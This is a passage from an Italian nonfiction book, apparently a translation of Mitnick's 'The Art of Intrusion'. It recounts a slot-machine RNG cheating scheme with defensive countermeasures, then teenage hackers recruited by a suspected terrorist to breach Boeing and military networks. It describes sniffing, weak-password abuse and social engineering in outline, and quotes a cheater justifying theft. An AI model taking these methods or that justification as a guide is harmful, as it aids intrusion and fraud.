tendesse a destare dei sospetti. E non si presentava con una ragazza 
o con una moglie, il che lo avrebbe aiutato a stare meglio nel ruolo. 
Credo che finì per fare cose che attirarono l’attenzione su di lui. Ma 
anche, mano a mano che il tempo passava e tutti diventavamo più spa- 
valdi, tendevamo ad andare alle macchine più costose che pagavano 
meglio e che, di nuovo, comportavano dei rischi per l'operazione. 


Anche se Mike non concorda, Alex sembra suggerire che era- 
no tutti e tre persone che amano rischiare e che continuarono a 
tirare la corda per vedere fin dove sarebbero potuti arrivare. Per 
dirla con le sue parole: “Credo che, in fondo, continuavamo ad 
aumentare il rischio”. 

Arrivò il giorno in cui Marco, seduto a una macchina in un 
casinò, si ritrovò circondato da un gruppo di palestrati della si- 
curezza che lo sollevarono e lo spinsero in una stanza per gli in- 
terrogatori nel retro. 

Alex racconta la scena: 


Era spaventoso perché senti sempre le storie su questi tipi che spre- 
mono le persone come limoni. Questa è gente famosa per il “chis- 
senefotte della polizia, a questo ci pensiamo noi”. 

Marco era teso ma era anche una persona coriacea. Di fatto sono 
contento che in qualche modo sia stato lui a essere beccato se qual- 
cuno di noi doveva esserlo, perché credo fosse il più preparato a ge- 
stire quella situazione. Per quanto ne so, si era già trovato di fronte 
a situazioni simili quando era in Europa. 

Mostrò una certa lealtà e non fece i nostri nomi. Non citò alcun so- 
cio o niente del genere. Era nervoso e agitato ma fu molto tosto quan- 
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do si trovò sotto pressione e affermò che lavorava da solo. Disse: 
“Che c'è, sono in arresto, siete poliziotti, qual è il problema?”. 

È un tipo di interrogatorio simile a quello degli ufficiali di polizia a 
eccezione del fatto che non sono poliziotti e non hanno alcuna au- 
torità reale, il che è in qualche modo strano. Hanno continuato a in- 
terrogarlo, ma non l'hanno esattamente maltrattato. 


Presero la sua “caraffa”, racconta Alex, e gli confiscarono il 
computer e tutti i soldi, circa settemila dollari in contanti. Dopo 
circa un'ora di domande, o forse molto di più — era troppo spa- 
ventato per esserne sicuro — lo lasciarono andare. 

Marco chiamò gli altri mentre tornava a casa. Sembrava esa- 
gitato. Disse: “Ragazzi voglio raccontarvi cos'è successo. Mi sa 
che ho combinato un casino”. 

Sia Alex che Mike non erano contenti per uno dei rischi non 
necessari che Marco aveva corso. Non metteva il bottone nella 
scarpa come gli altri due, insistendo testardamente nel tenere lo 
strumento nella tasca della giacca per attivarlo con la mano. Alex 
descrive Marco come uno che “riteneva gli addetti alla sicurezza 
così stupidi che lui poteva continuare a mettergli la tasca, con 
quello stava facendo, proprio sotto al naso”. 

Alex è convinto di sapere cosa è accaduto anche se non era pre- 
sente. (In realtà, gli altri tre non sapevano che Marco era andato a 
un casinò, nonostante vi fosse tra loro un accordo di informarsi a 
vicenda sui rispettivi piani.) Alex se lo immagina così: “Si sono ac- 
corti semplicemente che stava vincendo una somma di soldi mol- 
to alta e che c'era qualcosa di strano nella sua mano”. Marco non 
aveva minimamente pensato a cosa avrebbe potuto indurre gli ad- 
detti del piano a notarlo e a insospettirsi. 

Per Alex quella fu l’ultima volta, anche se non è del tutto si- 
curo che lo fu anche per gli altri. “La nostra decisione all’inizio 
era che se qualcuno di noi fosse mai stato beccato avremmo smes- 
so tutti insieme.” Dice: “L'abbiamo rispettata tutti da quello che 
ne so”. E dopo un momento di esitazione aggiunge, meno sicu- 
ro: “Almeno io l'ho fatto”. Mike concorda, ma nessuno di loro ha 
mai posto la domanda a Marco direttamente. 

I casinò di solito non sporgono denuncia per gli attacchi come 
quelli perpetrati dai quattro. “La ragione è che non vogliono pub- 
blicizzare che hanno dei punti vulnerabili,” spiega Alex. Così di so- 
lito ti dicono: “Lascia la città prima del tramonto. E se sei d'accor- 
do a non mettere mai più piede in un casinò, ti lasceremo andare”, 


Le conseguenze 


Dopo sei mesi, Marco ricevé una lettera in cui gli veniva co- 
municato che non sarebbe stato denunciato. 


39 


I quattro sono ancora amici, anche se non così stretti. Alex 
calcola di aver ricavato trecentomila dollari dall’avventura, una 
parte dei quali sono andati a Larry come d’accordo. I tre soci che 
andavano nei casinò correndo tutti i rischi avevano detto ini- 
zialmente che avrebbero diviso equamente tra loro, ma Alex cre- 
de che Mike e Marco abbiano guadagnato dai quattrocentomila 
al mezzo milione di dollari ciascuno. Mike non riconosce di es- 
sersi portato via più di trecentomila dollari, ma ammette che Alex 
probabilmente ha preso meno di lui. 

Avevano giocato ininterrottamente per circa tre anni. Nono- 
stante i soldi guadagnati, Alex è contento che sia finita: “In un 
certo senso, mi sento sollevato. Il divertimento si era dissolto. Era 
diventato una specie di lavoro. Un lavoro rischioso”. Anche a Mike 
non dispiace che sia finita e si lamenta leggermente del fatto che 
“fosse diventato un po’ logorante.” 

In principio erano entrambi riluttanti a raccontare la storia 
ma poi l'hanno fatto con gusto. E perché no. Nei circa dieci an- 
ni che sono passati da allora, nessuno dei quattro ha mai spiffe- 
rato nulla sull'accaduto a nessun altro, a eccezione delle mogli e 
delle ragazze che furono coinvolte. Raccontarlo per la prima vol- 
ta, protetti dall'accordo dell’anonimato assoluto, è stato una spe- 
cie di sollievo. Ovviamente gli è piaciuto ricostruire i dettagli del- 
la vicenda, con Mike che ha ammesso che è stata “una delle co- 
se più eccitanti che abbia mai fatto”. 

Alex probabilmente parla per tutti loro quando descrive il suo 
punto di vista nei confronti di quell’avventura: 


Non mi sento così in colpa per i soldi che abbiamo vinto. Per quel- 
l'industria è una goccia in un mare. Voglio essere onesto: non ci sia- 
mo mai sentiti moralmente compromessi, perché stiamo parlando 
dei casinò. 

Era facile farsene una ragione. Stavamo derubando i casinò che de- 
rubano le vecchiette offrendo loro dei giochi cui non possono vin- 
cere. Las Vegas la vedevamo come persone attaccate a macchine suc- 
chiasoldi, che buttano via la propria vita un quarto di dollaro dopo 
l’altro. Così sentivamo che ci stavamo rifacendo sul “grande fratel- 
lo” e non rubando la vincita a una povera vecchietta. 

C'è un adagio laggiù che recita: “Se peschi le carte giuste, vinci”. Ab- 
biamo pescato le carte giuste. Solo che loro non si aspettavano che 
ci fosse qualcuno in grado di farlo. 


Alex dice che oggi non riproverebbe a fare nulla di simile. Ma 
la sua motivazione potrebbe non essere quella che vi aspettate: 
“Ho altri modi per guadagnare. Se mi trovassi nella stessa posi- 
zione economica in cui mi trovavo all’epoca, probabilmente ci 
proverei di nuovo”. Considera quello che hanno fatto come ab- 
bastanza giustificato. 
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In questo gioco del gatto e del topo, il gatto impara conti- 
nuamente i nuovi trucchi del topo e prende delle misure adeguate. 
Le slot machine dei giorni nostri usano software progettati mol- 
to meglio; i quattro non sono sicuri che riuscirebbero a farcela 
se provassero a craccarli di nuovo. E tuttavia non ci sarà mai una 
soluzione perfetta per nessuna delle questioni legate alla tecno- 
sicurezza. Alex la spiega in modo molto efficace: “Ogni volta che 
un qualche [sviluppatore] dice: ‘Nessuno si prenderà la briga di 
fare quella cosa’, c'è un ragazzino in Finlandia che si prenderà la 
briga di farla”. 

E non solo in Finlandia, anche in America. 


Riflessioni 


Negli anni novanta, i casinò e i programmatori delle mac- 
chine da gioco non avevano ancora pensato ad alcune cose che 
in seguito sarebbero divenute ovvie. Uno pseudogeneratore di nu- 
meri random non genera in realtà numeri casuali. Piuttosto, ar- 
chivia una lista di numeri in ordine casuale. Nel nostro caso, una 
lista molto lunga: due alla trentaduesima potenza, più o meno un 
miliardo di numeri. All’inizio del ciclo il software seleziona ca- 
sualmente una posizione nell’elenco. Dopodiché usa i numeri sul- 

‘ Ja lista in successione, l'uno dopo l’altro. 

Facendo reverse engineering del software, i quattro avevano 
trovato l'elenco. Da un qualsiasi punto dell’elenco “casuale”, po- 
tevano determinare ogni numero successivo e con la conoscen- 
za aggiuntiva del tempo di iterazione di una determinata mac- 
china, potevano determinare quanto tempo doveva passare in mi- 
nuti e secondi prima che la macchina estraesse una scala reale. 


Contromisure 


Gli ideatori di qualsiasi prodotto che fa uso di chip Rom e di 
software dovrebbero prevenire i problemi di sicurezza. E per ogni 
azienda che fa uso di software e di prodotti informatici - il che 
di questi tempi significa pressoché ogni azienda, compresi i ne- 
gozi gestiti da una sola persona - è pericoloso dare per scontato 
che le persone che hanno costruito i vostri sistemi abbiano pen- 
sato a tutti i punti deboli. I programmatori dei software delle slot 
machine giapponesi avevano commesso l'errore di non essere ab- 
bastanza lungimiranti sul tipo di attacchi che potevano essere 
portati. Non avevano preso alcuna misura di sicurezza per im- 
pedire che qualcuno potesse mettere le mani sul firmware. Avreb- 
bero dovuto prevedere che qualcuno avrebbe potuto aprire la 
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macchina, estrarne il chip Rom, leggere il firmware e recupera- 
re le istruzioni del programma che dice alla macchina come la- 
vorare. Anche se avessero considerato quell’evenienza, probabil- 
menteritennero che conoscere esattamente il funzionamento del- 
la macchina non sarebbe stato sufficiente, considerando che la 
complessità del calcolo necessaria a craccare il generatore di nu- 
meri random avrebbe sconfitto qualsiasi tentativo. Il che potrebbe 
essere vero oggi, ma non all’epoca. 

Così supponiamo che la vostra azienda venda prodotti hardwa- 
re che contengono dei chip; che cosa dovreste fare per garantirvi 
una protezione adeguata contro il concorrente che vuole dare un'oc- 
chiata al vostro software, l'azienda straniera che vuole fare un'i- 
mitazione a basso costo, o l'hacker che vuole raggirarvi? 

Primo passo: rendere difficile l’accesso al firmware. Ci sono 
diversi metodi possibili, tra cui: 


e Acquistate dei chip fabbricati per essere sicuri contro gli at- 
tacchi. Diverse società vendono chip progettati specificamente 
per situazioni in cui le possibilità di attacchi sono alte. 

e Usate un chip on board; una striscia in modo che il chip sia 
integrato nella scheda a circuiti e non possa essere rimosso co- 
me elemento separato. 

e Fissate il chip sulla scheda con la resina epossidica, in mo- 
do che se viene fatto un tentativo di rimuoverlo, il chip si rompe. 
La tecnica può essere migliorata aggiungendo alla resina epossi- 
dica della polvere di alluminio; se qualcuno cerca di rimuovere 
il chip riscaldando la resina, l'alluminio distrugge il chip. 

e Usate un modello Ball Grid Array (Bga). Con questo tipo 
di configurazione i connettori non escono dai lati del chip ma. 
sì trovano invece sotto il chip, rendendo difficile, se non im- 
possibile, catturare il flusso del segnale del chip mentre è fis- 
sato alla scheda. 


Un'altra contromisura possibile consiste nel grattare via ogni 
informazione identificativa dal chip, in moto tale che si priva il 
cracker delle informazioni sul produttore del chip. 

Una pratica piuttosto comune, utilizzata dai produttori di 
macchine citate nella nostra storia, consiste nell'impiego della 
scansione della somma (hashing), un dispositivo che prevede lin- 
serimento di una routine? di verifica della somma nel software. 
Se il programma è stato alterato, la scansione della somma non 
risulterà corretta e il software non attiverà lo strumento. In ogni 
caso, gli hacker esperti che conoscono questo metodo controlla- 
no il software per vedere se è stata inserita la routine, e se la tro- 


5 Programma o porzione di un programma. {N.d.T.] 
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vano, la disattivano. Per questo è molto meglio unire uno o più 
metodi per proteggere fisicamente il chip. 


Conclusioni 


Se il vostro firmware è brevettato e di valore, consultate i mi- 
gliori esperti di sicurezza per scoprire quali tecniche gli hacker 
stanno usando al momento. Assicuratevi che i vostri progettisti 
e programmatori siano sempre aggiornati. E siate sicuri di fare 
tutti i passi giusti per raggiungere il massimo livello di sicurezza 
possibile commisurato ai costi. 
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2. 
Quando chiamano i terroristi 


Non so perché continuavo a farlo. Natura com- 
pulsiva? Fame di soldi? Sete di potere? Posso 
elencare una serie di possibilità. 

ne0h 


L'hacker di vent'anni che si firma Comrade vive in questi gior- 
ni in una casa di proprietà, insieme a suo fratello, in una bella zo- 
na di Miami. C'è anche loro padre, ma solo perché suo fratello è 
ancora minorenne e i Servizi per l'infanzia insistono affinché al- 
meno un adulto rimanga in casa finché il ragazzo non avrà com- 
piuto diciotto anni. Ai fratelli non importa e papà ha il suo appar- 
tamento altrove, dove farà ritorno quando sarà il momento. 

La mamma di Comrade divorziata è morta due anni fa e ha 
lasciato casa ai figli. Ha lasciato anche dei soldi in contanti. Suo 
fratello frequenta le superiori ma Comrade vive “alla giornata”. 
La sua famiglia in linea generale non approva, dice Comrade, 
“ma a me non importa nulla”. Quando sei stato in prigione da 
giovane — nel suo caso, il più giovane hacker mai detenuto sulla 
base di accuse federali — quell'esperienza tende a cambiare i tuoi 
valori. 

L'hacking non conosce confini nazionali naturalmente, così 
nessuno dei due dà particolare importanza al fatto che ne0h, l'a- 
mico hacker di Comrade, si trovi a quasi cinquemila chilometri 
di distanza. L'hacking è ciò che li ha fatti incontrare, e l’hacking 
è ciò che li ha messi su una china scivolosa che li avrebbe porta- 
ti alla fine a introdursi in sistemi informatici altamente sensibi- 
li. Azioni che, lo avrebbero ricostruito in seguito, stavano aiu- 
tando la causa del terrorismo internazionale. Di questi tempi, non 
è certo un peso facile da sostenere. 

Di un anno più grande di Comrade, ne0h ha “usato i compu- 
ter sin da quando potevo arrivare alla tastiera”. Suo padre gesti- 
va un negozio di componenti per computer e si portava dietro il 
figlio agli appuntamenti con i clienti; il bambino gli sedeva sulle 
gambe durante gli incontri di vendita. All’età di undici anni, scri- 
veva in codice dBase per l'azienda del padre. 

A un certo punto, ne0h si imbatté in una copia del libro Take- 
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down,! che è un resoconto veramente inaffidabile dei miei ex- 
ploit? da hacker, dei miei tre anni di fuga e della caccia datami 
dal Fbi. ne0h rimase rapito dal libro: 


Per me sei stato un faro. Sei il mio mentore, porca puttana. Ho let- 
to tutto il possibile su quello che hai fatto. Volevo diventare famoso 
come te. 


Fu la motivazione a spingerlo all’hacking. Decorò la sua stan- 
za con una serie di computer, di hub di rete e con una bandiera 
pirata lunga due metri e si preparò a seguire le mie orme. 

ne0h iniziò ad accumulare conoscenze e delle solide capacità 
per un hacker. Prima arrivarono le capacità, poi la discrezione. 
Usando il gergo degli hacker per descrivere un giovane che è an- 
cora un principiante, racconta: “Ai tempi in cui ero ancora uno 
script kiddie, defacciavo i siti web e ci mettevo sopra il mio vero 
indirizzo e-mail”.3 

ne0h passava il tempo sulle Internet Relay Chat (Irc) — delle 
chat di testo dove le persone possono condividere online i propri 
interessi e scambiarsi informazioni in tempo reale con altri uten- 
ti — dedicate alla pesca a mosca, agli aeroplani antichi, alla birra 
fatta in casa o a qualche altro migliaio di argomenti, tra cui 
l’hacking. Quando scrivi un messaggio su un canale Irc, tutti quel- 
li che sono online in quel momento, vedono quello che stai scri- 
vendo e possono rispondere. Anche se molte persone che usano 
Irc regolarmente non sembrano rendersene conto, le comunica- 
zioni possono essere facilmente registrate. Credo che al giorno 
d'oggi i log delle chat contengano tante parole quanti tutti i libri 
della Biblioteca del Congresso e il testo digitato in fretta, con scar- 
sa considerazione dei posteri, può essere recuperato anche ad an- 
ni di distanza. 

Anche Comrade trascorreva il tempo su alcuni degli stessi si- 
ti Irc e strinse un'amicizia a lunga distanza con ne0h. Gli hacker 
stringono frequentemente delle alleanze per scambiarsi infor- 
mazioni e per sferrare degli attacchi di gruppo. ne0h, Comrade 
e un altro ragazzino decisero di creare il loro gruppo, che bat- 
tezzarono gli “Elfi di Keebler”. Pochi altri hacker erano ammes- 
si alle conversazioni del gruppo, ma i tre membri originali ten- 


! Tr. it., Tsutomu Shimomura (con John Markoff), Hackers! Sulle tracce di 
Kevin Mitnick, il più pericoloso pirata Informatico, Sperling & Kupfer, Milano 
2000. 

? Attacco informatico che si basa sullo sfruttamento della vulnerabilità di 
un'applicazione o di un sistema informatico. 

3 Il defacciamento di un sito web consiste nella sostituzione delle sue pagi- 
ne con pagine modificate dall'autore o dagli autori dell’intrusione non autoriz- 
zata. [N.d.T] 
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nero gli altri all'oscuro dei loro attacchi “blackhat”. “Entravamo 
nei siti del governo per divertimento,” racconta Comrade. Se- 
condo la sua stima, irruppero in “circa duecento” siti governati- 
vi apparentemente sicuri. 

Un certo numero di canali Irc sono punti d'incontro per gli 
hacker di ogni risma. Uno in particolare, un network di nome Ef- 
net, è un sito che Comrade descrive come “non proprio l’under- 
ground dell'informatica: è un gruppo di server piuttosto grossi”. 
Ma all’interno di Efnet c'erano dei canali meno conosciuti, posti 
che non era facile raggiungere da soli ma che ti dovevi far dire 
da altri hacker “blackhat” di cui avevi guadagnato la fiducia. Que- 
sti canali, dice Comrade, erano “piuttosto nascosti.” 


Khalid il terrorista getta l'amo 


Intorno al 1998 in questi canali “piuttosto nascosti”, Comra- 
de iniziò a sentir parlare di un tipo che “si aggirava” con lo pseu- 
donimo di RahulB. (In seguito avrebbe usato anche Rama3456.) 
“Era in qualche modo risaputo che voleva che gli hacker entras- 
sero nei computer del governo e dei militari, i siti .gov e .mil,” 
racconta Comrade. “Girava voce che lavorasse per bin Laden. 
Questo prima dell’11 settembre, quando bin Laden non era un 
nome che sentivi al telegiornale tutti i giorni.” 

Alla fine Comrade incrociò il suo cammino con l'uomo del 
mistero, che sarebbe venuto a conoscere con il nome di Khalid 
Ibrahim. “Gli parlai un po’ di volte [su Irc] e una volta ci siamo 
sentiti anche al telefono. Luomo aveva un accento straniero.” 

Anche ne0h finì nel mirino di Khalid, il quale con lui fu più 
diretto ed esplicito: 


Intorno al 1999 fui contattato via e-mail da un uomo che si autode- 
finiva un combattente e che diceva di trovarsi in Pakistan. Mi diede 
il nome di Khalid Ibrahim. Mi disse che stava lavorando per conto 
di combattenti pakistani. 


Ma davvero qualcuno alla ricerca di giovani hacker ingenui 
si avvolgerebbe in una bandiera terrorista, anche prima dell’11 
settembre? A prima vista l’idea sembra assurda. Quest'uomo 
avrebbe affermato in seguito di essere andato a scuola negli Sta- 
ti Uniti, che aveva fatto egli stesso un po’ di hacking, e che era 
entrato in contatto con gli hacker mentre si trovava qui. Così 
avrebbe potuto conoscere, o pensato di conoscere, qualcosa del- 
la mentalità degli hacker. Ogni hacker è in un certo senso un ri- 
belle che vive secondo regole differenti e vuole combattere il si- 
stema. Dopotutto se vuoi preparare una trappola per gli hacker 
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non sarebbe così stupido annunciare che anche tu sei uno che in- 
frange le regole e sei un contestatore. Forse può rendere la tua 
storia personale molto più credibile, e i soci che ti vuoi accatti- 
vare molto meno cauti e sospettosi. 

E poi c'erano i soldi. Khalid offrì a ne0h mille dollari per 
hackerare la rete locale di un'università cinese - un posto che 
ne0h descrive come il Mit cinese — e fornirgli i file del database 
degli studenti. Probabilmente si trattava di un test, sia delle ca- 
pacità di hacking di ne0h sia della sua ingenuità. Come puoi 
hackerare un sistema informatico quando non sei in grado di leg- 
gerne la lingua? Ancora più difficile: come fai a fare del social en- 
gineering per entrare quando non parli la lingua? 

Per ne0h, il problema della lingua non si rivelò affatto una 
barriera. Iniziò frequentando i siti Irc usati da un gruppo di hacker 
di nome gLobaLbeLL e attraverso quel gruppo stabilì un contat- 
to con uno studente di informatica all'università. Quindi chiese 
allo studente un paio di nomi utenti e di password. L'informa- 
zione per iscriversi passò rapidamente da un hacker all’altro, sen- 
za domande. ne0h scoprì che il livello di sicurezza informatica 
dell'università, il che era molto sorprendente per un'università di 
tipo-ingegneristico, dove in teoria avrebbero dovuto saperne di 
più. La maggior parte degli studenti avevano scelto delle pass- 
word identiche ai loro nomi utenti, la stessa parola o frase per 
entrambe gli usi. 

La breve lista che lo studente aveva fornito era sufficiente a 
garantire a ne0h l’accesso, permettendogli di “sniffare”, per dirla 
nel gergo degli hacker. Questa attività gli rivelò uno studente ~ lo 
chiameremo Chang - che si collegava a siti Ftp (siti per scaricare 
file), negli Stati Uniti. Tra questi siti Ftp c'era un sito “warez”, da 
cui si potevano scaricare dei software. Usando un classico trucco 
di social engineering, ne0h entrò nella rete del college venendo a 
conoscenza di alcune espressioni in uso nel campus. Tutto ciò fu 
più semplice di quanto si pensi, poiché “la maggior parte di loro 
parla inglese”, dice ne0h. Quindi entrò in contatto con Chang, 
usando un account che fece sembrare come se ne0h lo avesse con- 
tattato dal laboratorio di informatica del campus. 

“Sono della palazzina 213,” disse a Chang elettronicamente 
e gli chiese direttamente i nomi degli studenti e i loro indirizzi e- 
mail, come se fosse stato uno studente qualsiasi interessato a en- 
trare in contatto con i compagni di classe. Poiché la maggior par- 
te delle password erano così semplici, accedere ai file degli stu- 
denti non richiese alcuno sforzo. 

Molto presto fu in grado di consegnare a Khalid delle infor- 
mazioni estratte dai database di circa cento studenti: “Gliele die- 
di e mi rispose: ‘Ho tutto quello di cui ho bisogno”. Khalid era 
soddisfatto; ovviamente non era affatto interessato a quei nomi, 
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aveva solo voluto vedere se ne0h era veramente in grado di tro- 
vare le informazioni da una fonte così remota. “Questo è il pun- 
to in cui iniziò il nostro rapporto,” sintetizza ne0h. “Potevo fare 
il lavoro, lui sapeva che ero in grado di farlo, così iniziò ad asse- 
gnarmi altri compiti.” 

Nel dire a ne0h di controllare la sua cassetta postale per rice- 
vere i mille dollari, Khalid iniziò a chiamarlo via cellulare circa 
una volta a settimana, “di solito mentre guidava”. Il compito suc- 
cessivo era di hackerare il sistema informatico del Bhabha Atomic 
Research Center, in India. Il sistema girava su una workstation del- 
la Sun, una macchina familiare a ogni hacker. ne0h vi entrò senza 
grosse difficoltà ma scoprì che la macchina non conteneva nessu- 
na informazione interessante e sembrava essere isolata, scollega- 
ta dalla rete. Khalid non sembrò irritato per il fallimento. 

Nel frattempo, i soldi per l'università cinese non si erano an- 
cora materializzati. Quando ne0h gli chiese il perché, Khalid si 
innervosì: “Non li hai mai ricevuti? Te li ho spediti in contanti 
dentro a un biglietto di auguri!”, insisté. La vecchia manovra del 
tipo “il tuo assegno è stato spedito”. Eppure ne0h era pronto ad 
accettare nuovi compiti. Perché? Oggi è disposto a rifletterci: 


Continuavo a farlo perché sono testardo. In realtà era eccitante pen- 
sare che sarei stato pagato per farlo. E pensavo: “Forse si è vera- 
mente perso nella posta, forse mi pagherà questa volta”. 

Non so perché continuavo a farlo. Natura compulsiva? Fame di sol- 
di? Sete di potere? Posso elencare una serie di ragioni. 


Nello stesso periodo in cui Khalid continuava ad assegnare 
compiti a ne0h, frequentava anche altri canali Irc alla ricerca di 
altri volontari. Comrade era uno di loro, ma più cauto nell’ac- 
cettare una qualche forma di pagamento: 


Avevo capito che stava pagando le persone, ma non avevo mai vo- 
luto dargli informazioni personali e poi essere pagato. Quello che 
stavo facendo consisteva nel dare un'occhiata in giro. Ma se avessi 
iniziato a ricevere soldi, sarei diventato un vero criminale. Nella mag- 
gior parte dei casi gli parlavo in Irc e gli passavo un po’ di informa- 
zioni di tanto in tanto. 


Il giornalista Niall McKay parlò a un altro pesce che Khalid 
aveva catturato nella sua rete, un adolescente californiano il cui 
pseudonimo era Chamaleon (e che ora è il cofondatore di ura- 
zienda di sicurezza di successo). L'articolo di McKay pubblicato 
su wired.com* coincideva alla perfezione con i particolari forni- 


4“Do Terrorists Troll the Net?”, di Niall McKay, wired.com, 4 novembre 1998. 


48 


ti da ne0h e Comrade: “Ero su Irc una notte, quando questo tipo 
mi disse che voleva il software Dem. Io non ce l’avevo ed ero lì 
solo a scambiare due chiacchiere”, spiegava l’hacker. Ma questa 
volta Khalid si fece serio: “Dem” è il nickname del Defense Infor- 
mation System Network Equipment Manager, un software per le 
reti utilizzato dai militari. Il programma era stato catturato dal 
gruppo di hacker Masters of Downloading e girava voce che fos- 
se disponibile se chiedevi alla persona giusta. Nessuno sembra 
sapere se Khalid vi abbia mai messo le mani sopra, o perlome- 
no, nessuno lo dice. In realtà, non è neanche certo che il softwa- 
re gli sarebbe tornato di una qualche utilità, ma ovviamente lui 
pensava di sì. Khalid aveva finito di fare giochetti sulle univer- 
sità cinesi e cose del genere. 

“Cercava di integrarsi nelle attività del gruppo,” ci spiega ne0h. 
In seguito, Khalid monitorò segretamente gli hacker per un an- 
no e mezzo, ma “non come una persona qualsiasi che entra ed 
esce in modo regolare. Era sempre lì, ed era chiaro che quella era 
la sua cosa”. Per “la sua cosa”, ne0h intende l’intrusione in siti 
militari o nei sistemi informatici di aziende che lavorano su pro- 
getti militari. 

Khalid chiese a ne0h di entrare sul sito della Lockeed Martin 
e di ottenere gli schemi di alcuni sistemi di aviazione che la com- 
pagnia stava producendo per la Boeing. ne0h riuscì a penetrare 
solo in modo limitato nella Lockeed, “circa tre livelli nella rete in- 
terna”, ma non poté spingersi più in là di due server (a un livello 
che gli esperti di sicurezza chiamano Dmz, di fatto, una terra di 
mezzo). Il che non era sufficiente a penetrare i firewall che pro- 
teggono i dati più sensibili della corporation. Non riuscì così a lo- 
calizzare le informazioni che gli erano state richieste: 


[Khalid] si irritò. Di fatto mi disse: “Non lavori più per me. Non sei 
in grado di fare niente”. Ma poi mi accusò di occultamento. Disse 
che stavo tenendo le informazioni per me stesso. 

Poi disse: “Lascia perdere la Lockeed Martin. Entra direttamente 
nella Boeing”. 


ne0h scoprì che la Boeing “non era così sicura, se ti ci met- 
tevi d'impegno”. Riuscì a entrare, dice, sfruttando una nota vul- 
nerabilità di un sistema della Boeing spiegata su Internet. Quin- 
di, installando uno “sniffer”, poté monitorare tutti i pacchetti di 
dati che entravano e uscivano da un computer, in una sorta di in- 
tercettazione informatica. Dopodiché riuscì a impossessarsi di 
tutte le password e le e-mail non crittate. Le informazioni che 
estrasse dalle e-mail gli rivelarono una quantità di dati sensibili 
sufficienti per entrare nella loro rete interna: 
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Trovai sei o sette schemi di progettazione delle porte e della punta 
dei Boeing 747, che venivano passati semplicemente attraverso del- 
le e-mail di testo non crittate. Allegati non crittati. Non è incredibi- 
le?! (E ride.) 

Khalid era entusiasta. Disse che mi avrebbe dato quattromila dol- 
lari. Non si fece mai vivo: che sorpresa. 


In realtà, quattromila dollari sarebbero stati un prezzo as- 
solutamente esagerato per quell’informazione. A detta dell'ex 
direttore della sicurezza della Boeing, Don Boelling, questo at- 
tacco avrebbe potuto essere sferrato contro la compagnia nei 
termini descritti. Ma sarebbe stata una perdita di tempo: una 
volta che il modello di un aeroplano entra in servizio, a tutte le 
aerolinee del cliente viene distribuito un pacchetto completo 
anche di schemi. A quel punto, l'informazione non viene più 
considerata di particolare importanza dall'azienda; chiunque la 
vuole la può ottenere: “Ho visto addirittura un compact disc con 
gli schemi del 747 in offerta su eBay di recente”, dice Don. Ov- 
viamente, le probabilità che Khalid fosse a conoscenza di que- 
ste cose erano scarse. E tali sarebbero rimaste finché, due an- 
ni dopo, la nazione non avrebbe scoperto che alcuni terroristi 
erano mossi da forti motivazioni per volere i progetti dei più 
grandi aerei da trasporto utilizzati dalle compagnie aree degli 
Stati Uniti. i 


L'obiettivo di stanotte: Siprnet 


Per quel che riguarda Comrade, Khalid non si era preoccu- 
pato di affibbiargli test per verificare le sue capacità. Sin dal prin- 
cipio, dice l'hacker, Khalid “era interessato solo ai militari e a Si- 
prnet”. 


Nella maggior parte dei casi non era molto specifico nelle mie ri- 
chieste: chiedeva semplicemente l’accesso ai siti militari e del go- 
verno. A eccezione di Siprnet. Siprnet voleva davvero tutte le infor- 
mazioni possibili. 


Non stupisce che Khalid fosse molto interessato; questo era 
probabilmente il suo unico vero obiettivo. Siprnet fa parte del 
Disn, il Defense Information System Network, una rete che con- 
tiene informazioni segrete. Al di là di questo, Siprnet (che è Fa- 
cronimo di Secret Internet Protocol Router Network) è al mo- 
mento il centro di comando e controllo delle forze militari sta- 
tunitensi. 

ne0h aveva già rifiutato un'offerta di Khalid per l’accesso a 
Siprnet: > 
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Mi offrì duemila dollari. Rifiutai. Se fossi entrato in Siprnet, mi sa- 
rebbero arrivati a casa i federali. Duemila dollari non valevano un 
proiettile in testa. 


Quando Khalid parlò a Comrade del compito, il prezzo era 
salito. “Disse che mi avrebbe pagato, credo, diecimila dollari per 
entrare,” ricorda Comrade - il che suonava come un buon affa- 
re, meno scivoloso di quello proposto a ne0h — anche se insiste 
convinto che fu la sfida, e non i soldi, a tentarlo. 


Arrivai piuttosto vicino a Siprnet. Entrai nel sistema informatico 
della Defense Information Security Agency, la Disa. Quella macchi- 
na era di prim'ordine. Credo avesse quattro processori, circa due- 
mila utenti vi accedevano, l’host file di Unix aveva circa cinquemi- 
la ospiti, e la metà di questi usavano degli account privilegiati; do- 
vevi essere su quel computer per accedervi, non potevi entrarvi da 
fuori. 


Comunque ci fosse arrivato, l'intuizione di Comrade di esse- 
re finito su qualcosa di importante era giusta. Tra le missioni fon- 
damentali della Disa ci sono il comando e il controllo unificato, 
nonché il calcolo informatico di supporto al combattimento: una 
chiara sovrapposizione con le funzioni di Siprnet. Ma i suoi sfor- 
zi si interruppero presto. 


Era molto bello avere accesso a tutto questo, ma non ebbi mai ab- 
bastanza tempo per giocarci un po’ e andare in alcun dove. Fui bec- 
cato tre o quattro giorni dopo. 


Tempo di preoccuparsi 


Il giorno di Natale del 1999, per ne0h e Comrade suonò la 
campana. Il volo IC-814 della Indian Airlines, diretto da Kat- 
mandu a Nuova Dehli con 178 passeggeri e undici membri del- 
l'equipaggio a bordo, fu dirottato mentre era in volo. Secondo 
quanto riportato dai media, i dirottatori erano terroristi pakista- 
ni legati ai talebani. Terroristi come Khalid? 

In base agli ordini dei dirottatori, l’Airbus 300 procedette in 
un viaggio a zig zag di andata e ritorno con il Medio Oriente, at- 
terrando in India, in Pakistan e negli Emirati Arabi Uniti, dove 
venne prelevato il corpo di un passeggero assassinato, un giova- 
ne che faceva ritorno a casa insieme a sua moglie dal viaggio di 
nozze. Era stato accoltellato a morte per aver osato rifiutare di 
bendarsi. 

Il volo alla fine atterrò a Kandahar, in Afghanistan, aumen- 
tando le possibilità di un collegamento con i talebani. I passeg- 
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geri restanti e l'equipaggio vennero trattenuti a bordo per otto 
giorni di terrore e vennero alla fine rilasciati in cambio della scar- 
cerazione di tre militanti. Uno dei tre rilasciati, Sheikh Umer, 
avrebbe in seguito aiutato Mohammed Atta, uno dei capi degli 
attacchi dell'11 settembre alle Torri gemelle, nella ricerca di fi- 
nanziamenti. 

Dopo il dirottamento, Khalid disse a ne0h che il suo gruppo ne 
era responsabile e che lui stesso era stato coinvolto nella vicenda: 


Tutto ciò mi spaventò a morte. Era un uomo malvagio. Sentii che 
dovevo coprirmi il culo. 


Ma la paura di ne0h era tenuta a bada dalla sua avidità gio- 
